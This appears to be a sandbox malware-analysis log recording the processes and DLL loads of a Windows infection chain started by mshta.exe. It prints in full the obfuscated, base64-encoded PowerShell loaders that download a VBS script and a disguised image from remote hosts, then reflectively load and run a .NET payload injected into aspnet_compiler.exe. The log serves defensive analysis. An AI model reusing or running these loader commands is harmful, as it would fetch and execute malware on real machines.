                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
